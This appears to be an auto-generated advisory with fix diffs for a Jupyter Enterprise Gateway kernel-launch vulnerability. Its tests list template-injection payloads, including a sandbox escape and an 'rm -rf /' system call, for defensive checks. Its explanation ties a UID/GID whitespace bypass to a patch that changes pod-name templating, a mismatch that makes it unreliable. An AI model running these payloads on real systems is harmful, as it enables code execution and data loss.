    +        # This catches malicious templates like {{ foo.__class__ }} or {{ 1+1 }}
    +        if '{{' in result and '}}' in result:
    +            self.log.warning(
    +                "Invalid template syntax detected in KERNEL_POD_NAME: contains unsupported expressions"
    +            )
    +            return None
    +
    +        # Log missing variables and return None if any are missing
    +        if missing_vars:
    +            self.log.warning(f"Template variables not found in KERNEL_POD_NAME: {missing_vars}")
    +            return None  # Signal caller to use default
    +
    +        return result
    +
         def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             pod_name = kwargs["env"].get("KERNEL_POD_NAME")
     
    @@ -224,16 +259,25 @@ def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             else:
                 self.log.debug(f"Processing KERNEL_POD_NAME based on env var => {pod_name}")
                 if "{{" in pod_name and "}}" in pod_name:
    -                self.log.debug("Processing KERNEL_POD_NAME as jinja template")
    -                # Create Jinja2 environment
    +                self.log.debug("Processing KERNEL_POD_NAME template variables")
                     keywords = {}
                     for name, value in kwargs["env"].items():
                         if name.startswith("KERNEL_"):
                             keywords[name.lower()] = value
                     keywords["kernel_id"] = self.kernel_id
    -                self.log.debug("Processing pod_name jinja template")
    -                env = Environment(loader=BaseLoader(), autoescape=True)
    -                pod_name = env.from_string(pod_name).render(**keywords)
    +
    +                # Safe template substitution with fallback
    +                substituted = self._safe_template_substitute(pod_name, keywords)
    +                if substituted is None:
    +                    # Fall back to default if template variables are missing
    +                    self.log.warning(
    +                        "Falling back to default pod name due to missing template variables"
    +                    )
    +                    pod_name = (
    +                        KernelSessionManager.get_kernel_username(**kwargs) + "-" + self.kernel_id
    +                    )
    +                else:
    +                    pod_name = substituted
     
             # Rewrite pod_name to be compatible with DNS name convention
             # And put back into env since kernel needs this
    
  • enterprise_gateway/tests/test_process_proxy.py+231 0 added
    @@ -0,0 +1,231 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for Kubernetes process proxy security fixes."""
    +
    +import unittest
    +from unittest.mock import Mock, patch
    +
    +# Mock Kubernetes configuration before importing the module
    +with patch('kubernetes.config.load_incluster_config'), patch('kubernetes.config.load_kube_config'):
    +    from enterprise_gateway.services.processproxies.k8s import KubernetesProcessProxy
    +
    +
    +class TestKubernetesProcessProxy(unittest.TestCase):
    +    """Test secure template substitution in Kubernetes process proxy."""
    +
    +    def setUp(self):
    +        """Set up test fixtures."""
    +        self.mock_kernel_manager = Mock()
    +        self.mock_kernel_manager.get_kernel_username.return_value = "testuser"
    +        self.mock_kernel_manager.port_range = "0..0"  # Mock port range
    +
    +        # Mock proxy config
    +        self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
    +
    +        # Mock KernelSessionManager methods
    +        with patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
    +            self.proxy.kernel_id = "test-kernel-id"
    +
    +    def test_valid_template_substitution(self):
    +        """Test valid template variable substitution."""
    +        test_cases = [
    +            # Basic variable substitution
    +            ("{{ kernel_id }}", {"kernel_id": "test-123"}, "test-123"),
    +            # Multiple variables
    +            (
    +                "{{ kernel_namespace }}-{{ kernel_id }}",
    +                {"kernel_namespace": "default", "kernel_id": "test-123"},
    +                "default-test-123",
    +            ),
    +            # Variables with underscores
    +            ("{{ kernel_image_pull_policy }}", {"kernel_image_pull_policy": "Always"}, "Always"),
    +            # Whitespace handling
    +            ("{{   kernel_id   }}", {"kernel_id": "test-123"}, "test-123"),
    +        ]
    +
    +        for template, variables, expected in test_cases:
    +            with self.subTest(template=template):
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertEqual(result, expected)
    +
    +    def test_missing_variables_fallback(self):
    +        # Test the full pod name determination process
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming: kernel_username + "-" + kernel_id
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_malicious_template_injection_prevention(self):
    +        """Test prevention of malicious template injection attacks."""
    +        malicious_templates = [
    +            # Python code execution attempts
    +            "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].exit() }}",
    +            "{{ __import__('os').system('rm -rf /') }}",
    +            "{{ exec('print(\"pwned\")') }}",
    +            "{{ eval('1+1') }}",
    +            # Attribute access attempts
    +            "{{ kernel_id.__class__ }}",
    +            "{{ kernel_id.__dict__ }}",
    +            "{{ kernel_id.__globals__ }}",
    +            # Function calls
    +            "{{ range(10) }}",
    +            "{{ len(kernel_id) }}",
    +            "{{ str.upper(kernel_id) }}",
    +            # Jinja2 filters and expressions
    +            "{{ kernel_id|upper }}",
    +            "{{ kernel_id + '_suffix' }}",
    +            "{{ 1 + 1 }}",
    +            # Complex expressions
    +            "{{ kernel_id if kernel_id else 'default' }}",
    +            "{{ kernel_id[:5] }}",
    +        ]
    +
    +        variables = {"kernel_id": "test-123"}
    +
    +        for malicious_template in malicious_templates:
    +            with self.subTest(template=malicious_template), patch.object(
    +                self.proxy, 'log'
    +            ) as mock_log:
    +                result = self.proxy._safe_template_substitute(malicious_template, variables)
    +                # All malicious templates should be treated as invalid and return None
    +                self.assertIsNone(result)
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +    def test_pod_name_determination_with_templates(self):
    +        """Test complete pod name determination with template processing."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should get processed and DNS-normalized
    +            self.assertEqual(result, "production-test-kernel-id")
    +
    +    def test_pod_name_determination_with_malicious_template(self):
    +        """Test pod name determination with malicious template falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ __import__('os').system('evil') }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_determination_with_missing_variables(self):
    +        """Test pod name determination with missing variables falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_without_template(self):
    +        """Test pod name determination without template syntax."""
    +        kwargs = {"env": {"KERNEL_POD_NAME": "static-pod-name", "KERNEL_NAMESPACE": "production"}}
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should use as-is and DNS-normalize
    +            self.assertEqual(result, "static-pod-name")
    +
    +    def test_pod_name_dns_normalization(self):
    +        """Test DNS name normalization of pod names."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}_{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "Test-Namespace",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should be DNS-normalized (lowercase, dashes only)
    +            self.assertEqual(result, "test-namespace-test-kernel-id")
    +
    +    def test_regex_pattern_validation(self):
    +        """Test that only valid variable names are matched by regex."""
    +        valid_vars = [
    +            "kernel_id",
    +            "kernel_namespace",
    +            "kernel_image_pull_policy",
    +            "a",
    +            "var123",
    +            "KERNEL_ID",
    +        ]
    +
    +        # Variables that should be blocked by the regex pattern
    +        invalid_vars = [
    +            "123invalid",  # starts with number
    +            "invalid-var",  # contains dash
    +            "invalid.var",  # contains dot
    +            "invalid var",  # contains space
    +            "invalid@var",  # contains special char
    +            "_private_var",  # starts with underscore (security risk)
    +            "__class__",  # magic method (security risk)
    +            "__dict__",  # magic method (security risk)
    +            "__globals__",  # magic method (security risk)
    +        ]
    +
    +        variables = {var: "value" for var in valid_vars}
    +        # Also add underscore variables to test they're not substituted even if present
    +        variables.update(
    +            {"_private_var": "private", "__class__": "dangerous", "__dict__": "dangerous"}
    +        )
    +
    +        # Valid variables should be substituted
    +        for var in valid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            result = self.proxy._safe_template_substitute(template, variables)
    +            self.assertEqual(result, "value", f"Valid variable {var} should be substituted")
    +
    +        # Invalid variables should be treated as having invalid syntax
    +        for var in invalid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            with patch.object(self.proxy, 'log') as mock_log:
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertIsNone(result, f"Invalid variable {var} should be rejected")
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions since invalid var names don't match regex
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +
    +if __name__ == '__main__':
    +    unittest.main()
    
  • Makefile+1 1 modified
    @@ -67,7 +67,7 @@ clean-env: ## Remove conda env
     lint: ## Check code style
     	@pip install -q -e ".[lint]"
     	@pip install -q pipx
    -	ruff .
    +	ruff check .
     	black --check --diff --color .
     	mdformat --check *.md
     	pipx run 'validate-pyproject[all]' pyproject.toml
    
30de39dc5436

Update debian security repository for demo-base docker image

https://github.com/jupyter-server/enterprise_gateway · Luciano Resende · Mar 3, 2024 · Fixed in 3.3.0 via ghsa-release-walk
1 file changed · +2 1
  • etc/docker/demo-base/Dockerfile+2 1 modified
    @@ -53,7 +53,8 @@ RUN dpkg --purge --force-depends ca-certificates-java \
         software-properties-common \
         openssh-server \
         openssh-client \
    -    && apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main' \
    +    && apt-add-repository 'deb http://security.debian.org/debian-security bullseye-security main' \
    +    && apt-add-repository 'deb http://deb.debian.org/debian/ sid main' \
         && apt-get update && apt-get install -yq --no-install-recommends  \
         openjdk-8-jre-headless \
         ca-certificates-java \
    

Vulnerability mechanics

Root cause

"The check for prohibited UIDs and GIDs does not properly sanitize input, allowing bypass via whitespace."

Attack vector

An attacker can bypass the prohibited UID and GID feature by providing a specially crafted `KERNEL_UID` or `KERNEL_GID` value that includes trailing whitespace, such as '0 '. This bypasses the string comparison check in the `container.py` file. The crafted value is then used in the Kubernetes manifest, where the Jinja2 template parsing ignores the whitespace when converting the value to an integer for the `runAsUser` and `runAsGroup` fields. This allows a kernel to be launched with root privileges.
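
The mismatch between the two stages can be reproduced in a few lines of Python. This is a minimal sketch, not the project's code: `is_prohibited` is a hypothetical stand-in for the check in `container.py`, assuming it tests the raw string for membership in the comma-separated prohibited list, and `int()` stands in for the integer conversion applied in the template, which is assumed to behave like Python's `int()` and ignore surrounding whitespace.

```python
def is_prohibited(kernel_uid: str, prohibited: str = "0") -> bool:
    """Hypothetical stand-in for the original check: raw string membership."""
    return kernel_uid in prohibited.split(",")


crafted = "0 "  # "0" followed by a trailing space

# The exact string "0" is caught by the check.
print(is_prohibited("0"))      # True

# The crafted value is a different string, so the check lets it through.
print(is_prohibited(crafted))  # False

# Converting the crafted value to an integer discards the whitespace.
print(int(crafted))            # 0
```

The check and the consumer disagree about what the value means: one sees the string `'0 '`, the other sees the integer `0`.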

Affected code

The vulnerability lies in `enterprise_gateway/services/processproxies/container.py`, in the checks that compare `KERNEL_UID` and `KERNEL_GID` against `prohibited_uids` and `prohibited_gids` respectively. The Kubernetes manifest template `etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2` is also involved, because it uses Jinja2 to insert these values. The patch shown here modifies `enterprise_gateway/services/processproxies/k8s.py`, introducing the `_safe_template_substitute` method.
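
One general way to make a check of this kind robust is to compare parsed integers instead of raw strings, so that the check sees the same value the manifest will eventually use. The sketch below is illustrative only and is not the upstream fix; `parse_id` and `is_prohibited_id` are hypothetical names, and rejecting non-numeric input outright is a design assumption.

```python
def parse_id(value: str) -> int:
    """Parse a UID/GID string strictly; reject anything that is not ASCII digits."""
    text = value.strip()
    if not (text.isascii() and text.isdigit()):
        raise ValueError(f"not a numeric id: {value!r}")
    return int(text)


def is_prohibited_id(value: str, prohibited: str = "0") -> bool:
    """Compare as integers so that '0', '0 ', ' 0' and '000' are all treated as 0."""
    prohibited_ids = {parse_id(p) for p in prohibited.split(",") if p.strip()}
    return parse_id(value) in prohibited_ids


print(is_prohibited_id("0 "))    # True
print(is_prohibited_id("1000"))  # False
```

Passing the parsed integer onward, instead of the original string, keeps later stages from reinterpreting the input.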

What the fix does

The patch in `k8s.py` introduces a `_safe_template_substitute` method that uses regular expressions to substitute only simple template variables. After substitution, any remaining `{{ }}` pattern is treated as an unsupported expression, and a reference to an undefined variable is treated as missing; in both cases the method logs a warning and returns `None`. The `_determine_kernel_pod_name` function now calls this method for `KERNEL_POD_NAME` instead of rendering the value through a Jinja2 `Environment`, and when it receives `None` it falls back to the default name: the kernel username, a `-`, and the kernel ID. As a result, expressions embedded in a user-supplied `KERNEL_POD_NAME` are no longer evaluated.
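
The substitution behaviour described here can be sketched as a standalone function. This is an approximation reconstructed from the visible tail of the method and from the tests in the diff, not the project's implementation: the regular expression, the name `safe_substitute`, and the choice to replace missing variables with an empty string are assumptions, and logging is omitted.

```python
import re
from typing import Optional

# Assumed pattern: a name starting with a letter, then letters, digits or underscores.
_SIMPLE_VAR = re.compile(r"\{\{\s*([A-Za-z][A-Za-z0-9_]*)\s*\}\}")


def safe_substitute(template: str, variables: dict) -> Optional[str]:
    """Substitute plain {{ name }} placeholders; return None on anything else."""
    missing = []

    def replace(match: re.Match) -> str:
        name = match.group(1)
        if name in variables:
            return str(variables[name])
        missing.append(name)
        return ""  # drop the placeholder; the caller is told via None below

    result = _SIMPLE_VAR.sub(replace, template)

    # Anything still wrapped in {{ }} did not match the simple pattern,
    # e.g. attribute access, filters, arithmetic or function calls.
    if "{{" in result and "}}" in result:
        return None

    # Unknown variable names also signal the caller to use its default.
    if missing:
        return None

    return result


print(safe_substitute("{{ kernel_namespace }}-{{ kernel_id }}",
                      {"kernel_namespace": "default", "kernel_id": "test-123"}))
print(safe_substitute("{{ kernel_id|upper }}", {"kernel_id": "test-123"}))
```

Because nothing is ever handed to a template engine, the only operation available to the input is a dictionary lookup by name.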

Preconditions

  • config: Jupyter Enterprise Gateway is configured to prohibit UID/GID 0, which is the default (EG_PROHIBITED_UIDS=0, EG_PROHIBITED_GIDS=0).
  • input: The attacker must be able to control the KERNEL_UID or KERNEL_GID environment variable when launching a kernel.

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
